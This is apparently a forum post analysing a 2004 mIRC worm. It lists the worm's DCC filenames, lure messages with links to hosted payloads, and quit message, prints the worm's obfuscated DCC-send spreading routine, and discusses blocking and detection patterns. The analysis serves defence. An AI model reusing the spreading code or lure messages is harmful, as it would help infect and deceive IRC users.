http://www.vulnscan.org/tmp/virus/2004-04-16/
Code: Select all
- sends a dcc on-join
like:
DCC SEND C:\WINNT\system32\ManualSeduccion.zip 3232236866 2970 123897
DCC SEND C:\WINNT\system32\avril.zip 3232236866 3169 123897
DCC SEND C:\WINNT\system32\images.zip 3232236866 3684 123897
the C:\WINNT\system32\ thing is HARDcoded [!]
All possible names (prefixed with C:\WINNT\system32\):
notes.zip
videos.zip
xxx.zip
ManualSeduccion.zip
postal.zip
hechizos.zip
images.zip
sex.zip
avril.zip
AND <nick>.zip, so dynamic :/.
- privatemsgs with one of the following textstrings on-join:
4,1Free XXX SexVideo 8,1http://membres.lycos.fr/iserver5/sexescene.avi
0,13Mira la foto 4,1->8,14 http://membres.lycos.fr/iserver5/andrea.jpg
5No crees en lo paranormal? 14http://members.lycos.co.uk/iserver4/hada.gif :|
13,1Britney, Christina, Jennifer, etc 8,1http://utenti.lycos.it/yserver3/britney.avi
4,1Pics Models 13,1http://utenti.lycos.it/yserver3/viviana.jpg4,1 Models Pics
7,0Aprende a conquistar al sexo opuesto 13,0 http://mitglied.lycos.de/iserver2/seduccion.txt
4,8Mira esta foto 8,4http://members.lycos.nl/iserver1/ovni.jpg
4,1Free pics Girls, Teens 8,1http://mitglied.lycos.de/iserver2/katherine.jpg
12,0Jenifer Love Hewitt Sex Video 4,0http://members.lycos.nl/iserver1/jeniferlove.avi
- quits with url
* loser ([email protected]) Quit (Quit: mirate esto -> http://members.lycos.co.uk/iserver4/playboy.avi)
seems to be always the same (?)
Urls are simple to block, quitmsg too of course, dcc files are fun because it prefixes them with C:\WINNT\System32\ (see source) [note btw that mirc/most clients just skip everything till the last \ so the file shows up as just 'xxx.zip' etc]...
Here's the dcc send routine:
Code: Select all
Alias sv { var %pb = C:\WINNT\system32 $+ $decode(XGZpbGV6aXAuemlw,m)
if ($exists(%pb) = $false) { halt } | var %rb = $rand(1,10)
if (%rb = 1) { .copy -o %pb $nofile(%pb) $+ $decode(bm90ZXMuemlw,m) | Set %bv.file $nofile(%pb) $+ $decode(bm90ZXMuemlw,m) }
elseif (%rb = 2) { .copy -o %pb $nofile(%pb) $+ $decode(dmlkZW9zLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(dmlkZW9zLnppcA==,m) }
elseif (%rb = 3) { .copy -o %pb $nofile(%pb) $+ $decode(eHh4LnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(eHh4LnppcA==,m) }
elseif (%rb = 4) { .copy -o %pb $nofile(%pb) $+ $decode(TWFudWFsU2VkdWNjaW9uLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(TWFudWFsU2VkdWNjaW9uLnppcA==,m) }
elseif (%rb = 5) { .copy -o %pb $nofile(%pb) $+ $decode(cG9zdGFsLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(cG9zdGFsLnppcA==,m) }
elseif (%rb = 6) { .copy -o %pb $nofile(%pb) $+ $decode(aGVjaGl6b3Muemlw,m) | Set %bv.file $nofile(%pb) $+ $decode(aGVjaGl6b3Muemlw,m) }
elseif (%rb = 7) { .copy -o %pb $nofile(%pb) $+ $decode(aW1hZ2VzLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(aW1hZ2VzLnppcA==,m) }
elseif (%rb = 8) { .copy -o %pb $nofile(%pb) $+ $decode(c2V4LnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(c2V4LnppcA==,m) }
elseif (%rb = 9) { .copy -o %pb $nofile(%pb) $+ $decode(YXZyaWwuemlw,m) | Set %bv.file $nofile(%pb) $+ $decode(YXZyaWwuemlw,m) }
elseif (%rb = 10) { .copy -o %pb $nofile(%pb) $+ $me $+ .zip | Set %bv.file $nofile(%pb) $+ $me $+ .zip }
.ignore -rpcntikxu15 $address($nick,1) | csv $nick %bv.file $chan }
As you can see that last one is a bit more annoying coz it uses $me.
but still it can be recognized by c:\winnt\system32\*.zip, but dunnow how many false positives that will have.
Anyway.. dinner ;).